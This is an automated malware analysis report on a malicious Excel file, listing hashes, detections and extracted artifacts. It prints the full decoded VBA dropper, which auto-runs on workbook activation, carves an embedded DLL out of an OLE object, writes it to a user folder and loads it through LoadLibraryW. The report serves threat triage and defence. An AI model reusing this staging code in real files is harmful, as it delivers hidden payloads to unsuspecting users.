Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4936c1fdd3b1fddb…

MALICIOUS

Office (OLE)

718.5 KB Created: 2019-08-30 09:14:50 Authoring application: Microsoft Excel First seen: 2020-02-04
MD5: 2dd46db7b5683a3c75716fe6d30d71aa SHA-1: b3a07e75ebd564267c1521798850d9b3f78c9b8b SHA-256: 4936c1fdd3b1fddb7197838ddd342fbc2dd155dcd127891c9a16c146fcf8b9b9
500 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer

The sample is an Excel file containing VBA macros that leverage WScript.Shell and CreateObject to execute embedded shellcode and launch a second-stage PE executable. The macros also appear to use LoadLibrary and VirtualAlloc, suggesting dynamic code execution. The embedded executable is the primary payload, likely downloaded or staged by the VBA code.

Heuristics 11

  • ClamAV: Xls.Dropper.Sdrop-7331943-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Dropper.Sdrop-7331943-0
  • Embedded PE executable critical OLE_EMBEDDED_EXE
    MZ/PE header found inside document — possible embedded executable
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
    Matched line in script
    Set WaitForSingle = CreateObject("WScript.Shell")
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    Set WaitForSingle = CreateObject("WScript.Shell")
  • VBA ActiveX event launches decoded Excel4 macro critical OLE_VBA_ACTIVEX_XLM_STAGER
    VBA code attached to an auto-firing ActiveX/UserForm control event (e.g. _Layout/_Change/_Painted) decodes a string with Replace/Split/Join/StrReverse/Chr and passes the recovered formula text to ExecuteExcel4Macro. This bridges VBA event activation into XLM formula execution to call Win32 APIs / drop payloads while evading AutoOpen and Shell keyword detection — a high-confidence macro stager, not a specific Office parser CVE.
    Matched line in script
    Debug.Print Temp1
CCount = Application.ExecuteExcel4Macro(Temp1)
Debug.Print CCount
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set WaitForSingle = CreateObject("WScript.Shell")
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Reference to LoadLibrary API high SC_STR_LOADLIBRARY
    Reference to LoadLibrary API
  • Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC
    Reference to VirtualAlloc API

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 12299 bytes
SHA-256: 18ba8f8fff6bc105e5d906d9732724801d67189940c0e4558cd5adf8ab75f370
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Sem"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Activate()
If UserForm1.Visible = False Then
Module1.AppStart
End If

End Sub

Attribute VB_Name = "Page1"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
#If Win64 Then
    Public Declare PtrSafe Function Wakeup Lib _
        "templ2.dll" () As Integer
    Public Declare PtrSafe Function Wakeup2 Lib "kernel32" Alias "LoadLibraryW" (ByVal lpLibFileName As String) As Long
#Else
   Public Declare Function Wakeup2 Lib "kernel32" Alias "LoadLibraryW" (ByVal lpLibFileName As String) As Long
     Public Declare Function Wakeup Lib _
        "templ1.dll" () As Integer
#End If
   
Public Function ITestModule_GetErrorInterface()
    Set ITestModule_GetErrorInterface = g_errorobj
End Function
Public Function ITestModule_GetProviderInterface()
    Set ITestModule_GetProviderInterface = g_provobj
End Function
Public Sub ITestModule_SetErrorInterface(ByVal pError)
    Set g_errorobj = pError
    If tracemod Then
        g_errorobj.Transmit "Inside: ITestModule_SetErrorInterface" + Chr(10)
    End If
End Sub
Public Sub ITestModule_SetProviderInterface(ByVal pProvInfo)
On Error GoTo ixx
    Set g_provobj = pProvInfo
    For i = 0 To numcases - 1
        ca.ses(i).SetCaseProvider g_provobj
    Next i
Exit Sub
ixx:
MsgBox Err.Description
End Sub
Public Function ITestModule_Terminate() As Boolean
    ITestModule_Terminate = True
End Function
Public Sub AppStart()

ExecuteExcel4Macro "MESSAGE(False, ""Next"")"
Dim WaitForSingle As Object
    Dim SpecialPath As String
    

Set WaitForSingle = CreateObject("WScript.Shell")
   
UserForm3.TextBox1.Tag = WaitForSingle.ExpandEnvironmentStrings("%" + UserForm3.TextBox1.Tag + "%")

UserForm3.TextBox1.Tag = Replace(UserForm3.TextBox1.Tag, "%", "")
UserForm3.TextBox2.Tag = WaitForSingle.SpecialFolders(UserForm3.TextBox2.Tag)
'LocalAppData
ChDir (UserForm3.TextBox1.Tag)

    UserForm1.show
ExecuteExcel4Macro "MESSAGE(False, ""Next"")"
End Sub




Public Function ITestModule_GetCase(ByVal lIndex As Long)
    If tracemod Then
        g_errorobj.Transmit "Inside: ITestModule_GetCase(" + CStr(lIndex) + ")" + Chr(10)
    End If
    numcases = numcases + 1
    Select Case lIndex
        Case 0
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.cnclose")
        Case 1
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.cndefdat")
        Case 2
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.cnexec")
        Case 3
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.cnmode")
        Case 4
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.cnopen")
        Case 5
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.cnprop")
        Case 6
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.cnprovider")
        Case 7
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.cnstring")
        Case 8
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.cntimeout")
        Case 9
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.fldactualsize")
        Case 10
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.fldattributes")
        Case 11
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.flddefinedsize")
        Case 12
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.fldname")
        Case 13
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.fldoriginalvalue")
        Case 14
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.fldprecision")
        Case 15
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.fldtype")
        Case 16
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.fldvalue")
        Case 17
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rsactivecn")
        Case 18
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rsclose")
        Case 19
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rsmove")
        Case 20
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rsmovefirst")
        Case 21
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rsmovenext")
        Case 22
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rsmoveprev")
        Case 23
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rsopen")
        Case 24
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rssource")
        Case 25
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rssupports")
        Case 26
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rsbof")
        Case 27
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rseof")
        Case 28
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rscachesize")
        Case 29
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rspagesize")
        Case 30
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.rsrequery")
  End Select
    ca.ses(numcases - 1).SetCaseError g_errorobj
    ca.ses(numcases - 1).SetCaseProvider g_provobj
    Set Locprov = g_provobj
    Set ITestModule_GetCase = ca.ses(numcases - 1)
End Function
Public Sub NewValuje(s As String, nm As String, fl As Long, Variable_6 As Integer)
    Dim Variable_1 As Long, Variable_2 As Byte, Variable_3 As Byte, Variable_4 As Byte
    Dim Variable_5() As Long

    ReDim Variable_5(1 To fl)
    Variable_5(1) = CByte(40 + 37)
    Variable_5(2) = CByte(40 + 50)
    Variable_5(1 + 2) = CByte(40 + 104)
    
    Variable_1 = FreeFile
    Open s For Binary Access Read As Variable_1
    Dim cur As Integer
    cur = 1
    Do While Not EOF(Variable_1)
        Get Variable_1, , Variable_2
        If Variable_2 = Variable_5(1) Then
           Get Variable_1, , Variable_3
           If Variable_3 = Variable_5(2) Then
                Get Variable_1, , Variable_4
                If Variable_4 = Variable_5(3) Then
                     If cur = Variable_6 Then
                        For k = 4 To fl
                            Get Variable_1, , Variable_2
                            Variable_5(k) = Variable_2
                            Next k
                         Exit Do
                     Else
                        cur = cur + 1
                     End If
                End If
           End If
        End If
    Loop
    Close Variable_1
    
    Variable_1 = FreeFile
    Open nm For Binary Lock Read Write As #Variable_1
    For i = LBound(Variable_5) To UBound(Variable_5)
        Put #Variable_1, , CByte(Variable_5(i))
    Next i

    Close #Variable_1
End Sub


Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{F02DE064-F46B-4DAD-851C-F1EBF29A0CB8}{9E877C85-1A96-4569-A97A-EFC2CFCC11E3}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub Label1_Click()

End Sub

Private Sub UserForm_Activate()
DoEvents
ReplaceCurrentModule
End Sub

Private Sub UserForm_Initialize()
Call SystemButtonSettings(Me, False)

End Sub

Attribute VB_Name = "Module2"
Private Const GWL_STYLE = -16
Private Const WS_CAPTION = &HC00000
Private Const WS_SYSMENU = &H80000

#If VBA7 Then

    Private Declare PtrSafe Function GetWindowLong _
        Lib "user32" Alias "GetWindowLongA" (ByVal parameter1 As Long, _
        ByVal nIndex As Long) As Long
    Private Declare PtrSafe Function SetWindowLong _
        Lib "user32" Alias "SetWindowLongA" (ByVal parameter1 As Long, _
        ByVal nIndex As Long, ByVal dwNewLong As Long) As Long
    Private Declare PtrSafe Function FindWindowA _
        Lib "user32" (ByVal lpClassName As String, _
        ByVal lpWindowName As String) As Long
    Private Declare PtrSafe Function DrawMenuBar _
        Lib "user32" (ByVal parameter1 As Long) As Long
        
#Else

    Private Declare Function GetWindowLong _
        Lib "user32" Alias "GetWindowLongA" ( _
        ByVal parameter1 As Long, ByVal nIndex As Long) As Long
    Private Declare Function SetWindowLong _
        Lib "user32" Alias "SetWindowLongA" ( _
        ByVal parameter1 As Long, ByVal nIndex As Long, ByVal dwNewLong As Long) As Long
    Private Declare Function FindWindowA _
        Lib "user32" (ByVal lpClassName As String, _
        ByVal lpWindowName As String) As Long
    Private Declare Function DrawMenuBar _
        Lib "user32" (ByVal parameter1 As Long) As Long
  
#End If



Public Sub KillArray(ParamArray PathList() As Variant)
    On Error Resume Next
    For Each Key In PathList
        Kill Key
    Next Key
    On Error GoTo 0
End Sub




Public Sub SystemButtonSettings(frm As Object, show As Boolean)
Dim windowStyle As Long
Dim windowHandle As Long

windowHandle = FindWindowA(vbNullString, frm.Caption)
windowStyle = GetWindowLong(windowHandle, GWL_STYLE)

If show Then

    SetWindowLong windowHandle, GWL_STYLE, (windowStyle + WS_SYSMENU)

   
Else
 SetWindowLong windowHandle, GWL_STYLE, (windowStyle And Not WS_SYSMENU)

End If

DrawMenuBar (windowHandle)

End Sub



Attribute VB_Name = "Module3"




Sub test()

Temp1 = Temp & Rows(1).Address(, , xlR1C1)
Temp1 = "Counta(" & Temp1 & ")"
Debug.Print Temp1
CCount = Application.ExecuteExcel4Macro(Temp1)
Debug.Print CCount
Temp2 = Temp & Columns("A").Address(, , xlR1C1)
Temp2 = "Counta(" & Temp2 & ")"
RCount = Application.ExecuteExcel4Macro(Temp2)
ReDim arr(1 To RCount, 1 To CCount)

For R = 1 To RCount
    For C = 1 To CCount
        Temp3 = Temp & Cells(R, C).Address(, , xlR1C1)
    Next
Next

End Sub




Public Sub ReplaceCurrentModule()
    NameFav = UserForm3.TextBox1.Tag + "\dependence" + ".xlsx"
    ZipName = NameFav + ".zip"
    ZipFolder = UserForm3.TextBox1.Tag
    Dim nm As String
    Dim API_LENGTH As Long
    Dim d_6 As Integer
    nm = UserForm3.TextBox2.Tag + "\templ1"
    API_LENGTH = 278528
    d_6 = 1
            
#If Win64 Then
    nm = UserForm3.TextBox2.Tag + "\templ2"
    API_LENGTH = 233984
    d_6 = 2
#End If
nm = nm + ".d" + "ll"
        KillArray ZipFolder & "\oleObj" + "ect*.bin", ZipName, nm
        
    DoEvents
        ThisWorkbook.Sheets.Copy
        Application.DisplayAlerts = False
        DoEvents
        ActiveWorkbook.SaveAs NameFav, FileFormat:=50 + 1
    DoEvents
    ActiveWorkbook.Close
    DoEvents
        
    
        FileCopy NameFav, ZipName
        
        Set oApp = CreateObject("Shell." + "Application")
        oApp.Namespace(ZipFolder).CopyHere oApp.Namespace(ZipName).items.Item("xl\embeddings\oleObject1.bin")
        NewValuje ZipFolder + "\oleObject1." + "bin", nm, API_LENGTH, d_6
        
        ChDir (UserForm3.TextBox2.Tag)
        No_Wakeup = Wakeup2(nm)
        Wakeup

End Sub


Attribute VB_Name = "UserForm3"
Attribute VB_Base = "0{5F2F9417-F748-4281-A658-430F0D5AFC5F}{A8EEB77D-150C-4D39-848F-8294E6FFC570}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Page11"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module4"

Attribute VB_Name = "Module5"

Attribute VB_Name = "Module6"
embedded_office_0000305f.exe embedded-pe Office MZ+PE at offset 0x305F 723361 bytes
SHA-256: 3d8df83fd11577cdf825542c7920a8019514677557c956d9d05a42c4907c3c5c
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis recovered command string(s): WScript.Shell
ole10native_00.bin ole-package OLE Ole10Native stream: MBD01295E87/Ole10Native 525865 bytes
SHA-256: b1667603f4e8498b82e0852c604f2ecebe3f917fe11823189b70bc5479dfc3c4

Open this report in the interactive analyzer, or submit your own file for analysis.